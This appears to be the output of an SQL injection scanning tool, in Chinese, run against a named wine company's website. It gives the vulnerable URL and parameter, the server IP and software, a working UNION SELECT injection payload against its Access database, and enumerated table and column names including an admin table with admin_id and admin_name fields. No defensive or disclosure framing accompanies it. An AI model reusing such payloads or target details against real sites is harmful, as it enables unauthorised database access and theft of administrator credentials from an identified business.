■漏洞信息:============================================================
 ・URL:http://www.hzhonghu.com/imported_wine.asp?class_id=26
 ・页面标题：杭州弘湖公司|玛歌酒庄 葡萄酒-浙江葡萄酒-杭州葡萄酒有限公司-杭州葡萄酒销售公司-产品展示
 ・参数:class_id=26
 ・方法:GET
 ・类型:Numeric
 ・利用方法:And
 ・脚本语言:asp
 ・IP:61.191.188.210
 ・数据库:Access
 ・HEAD:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 28 May 2011 08:10:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 24392
Content-Type: text/html
Cache-control: private


联合查询列数: 总共= 6  显示的列= 1
联合查询SQL: and 3=8 union select 1,2,3,4,5,6 from MSysAccessObjects
找到表:admin
找到表:news
找到字段:admin.admin_id
找到字段:admin.admin_name
